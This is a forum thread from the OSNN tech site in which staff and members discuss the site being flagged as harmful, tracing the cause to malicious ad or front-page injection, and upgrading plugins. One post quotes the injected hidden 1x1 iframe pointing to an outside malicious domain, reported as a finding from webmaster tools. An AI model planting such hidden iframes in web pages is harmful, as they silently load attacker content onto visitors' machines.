Fixed OSNN now exploit free!

Status
Not open for further replies.

American Zombie

Administrator
Staff member
Political User
Re: OSNN picked up as 'Harmful'

Also I wouldn't suggest coming here with IE if the ads are in fact auto installing things like the Google malware warning states.
If you use good AV then the web module part of the AV should kick in before this could happen.

Electronic Punk

willalwaysbewithyou
Staff member
Political User

My Ie hasn't installed anything and norton hasn't detected anything.

Electronic Punk

willalwaysbewithyou
Staff member
Political User

Ok webmaster tools are listing the following pages:

8/13/10 /general-hardware/24472-my-speakers-keep-playing-static-noise.html
8/13/10 /general-hardware/80104-pci-usb-wireless-card-adapter.html
8/13/10 /windows-7-applications/99722-codecs-pack-recommended.html

All listed with :

iframe name="101" width="1" height="1" scrolling="no" frame
border="no" marginwidth="0" marginheight="0" src="http://www
.ytolkasa.co.cc/pika.php"

The domain shows as suspended

Electronic Punk

willalwaysbewithyou
Staff member
Political User

Contacted advertisers and requested a review.
Please keep letting me know of anything odd cos as you all know I hate ads with noise, popups, popunders and especially malware.

Johnny

.. Commodore ..
Political User

I tried all the adds and got a warning on all of them. Good one there having it investigated. This is driving me crazy lol ..

I know this is probably stupid, but, they are forum posts. I wonder if maybe one of the spammers we had here put a link to the questionable site?

One poster - haute34 has some spam links in his sig. I wonder if that could have something to do with it? scratch that. I just tried them and they are fine.

Couldn't you just delete the threads in question and get it to work again?

Electronic Punk

willalwaysbewithyou
Staff member
Political User

Issue is resolved but I am taking this opportunity to upgrade all plugins and products we currently use, will prob take all evening.

Electronic Punk

willalwaysbewithyou
Staff member
Political User

Ok updated vbseo, hopefully it isn't radically different - the options are at least so will take some time to go over it all

<------- Has Tweetboard too which I will disable if I think its useless/ is annoying.

Electronic Punk

willalwaysbewithyou
Staff member
Political User

Forums upgraded now, might be some glitches while I manually update a few templates.

gonaads

Beware the G-Man
Political User

I tried all the adds and got a warning on all of them. Good one there having it investigated. This is driving me crazy lol ..

I know this is probably stupid, but, they are forum posts. I wonder if maybe one of the spammers we had here put a link to the questionable site?

One poster - haute34 has some spam links in his sig. I wonder if that could have something to do with it? scratch that. I just tried them and they are fine.

Couldn't you just delete the threads in question and get it to work again?
It wasn't with any posts on forums but with front page. If you went to the front page (osnn dot net) by any bookmark you had or typed it into your browser on an unprotected machine it would bite you.

Tried a test with an old machine @ work with no AV on it and it got hammered. But a reboot in safe mode and a download/install of Hitman Pro 3.5 and it was all gone. It wasn't that nasty but still quite annoying.

Johnny

.. Commodore ..
Political User

It wasn't with any posts on forums but with front page. If you went to the front page (osnn dot net) by any bookmark you had or typed it into your browser on an unprotected machine it would bite you.

Tried a test with an old machine @ work with no AV on it and it got hammered. But a reboot in safe mode and a download/install of Hitman Pro 3.5 and it was all gone. It wasn't that nasty but still quite annoying.
I still refuse to install an AV. It is good that the site is fixed ...

Johnny

.. Commodore ..
Political User
I was doing some thinking last night and determined that if anything, this should want people to use Firefox, or chrome, more. I mean, if you were able to get into an exploited site with IE; that shows you how unprotected it is. It also makes you realize that MS has to get things on the ball if they want to even remotely try to make that thing they call a browser internet safe.

Electronic Punk

willalwaysbewithyou
Staff member
Political User
Sadly it wasn't limited to IE, we found that after you first loaded a page it set a cookie that prevented it from showing again which made it a bugger to trace but after many complete clears we found the code and tracked where it came from.

I would definately recommend running a spyware scan on your PC, although mine was clear and whatever process was run ran and didn't seem to do anything... mainly due to the fact that whatever it was redirecting to was taken down swiftly at the other end.

American Zombie

Administrator
Staff member
Political User

<------- Has Tweetboard too which I will disable if I think its useless/ is annoying.
Did you resize the page for this?

The front page is now messed up for me on the right side.
Maybe because I do not have a widescreen monitor.

Attachments

X-Istence

Political User
The lightbox for the picture above was all kinds of screwed up. It created a scrollbar at the bottom of the page.

Status
Not open for further replies.

Members online

No members online now.

Latest profile posts

Perris Calderon wrote on Electronic Punk's profile.
Hey ep!

All good with me, applying for microsoft mvp right now, should have done this a while ago.

Notifications don't work, I only found your response by comming back to hunt up some threads, if you want, give me your email address so we can keep in touch easier, mine is perriscalderon at gmail
Perris Calderon wrote on Electronic Punk's profile.
Ep, glad to see you come back and tidy up...did want to ask a one day favor, I want to enhance my resume , was hoping you could make me administrator for a day, if so, take me right off since I won't be here to do anything, and don't know the slightest about the board, but it would be nice putting "served administrator osnn", if can do, THANKS

Been running around Quora lately, luv it there https://tinyurl.com/ycpxl
Electronic Punk wrote on Perris Calderon's profile.
All good still mate?
Hello, is there anybody in there? Just nod if you can hear me ...

Forum statistics

Threads
Members
Latest member
Samhicks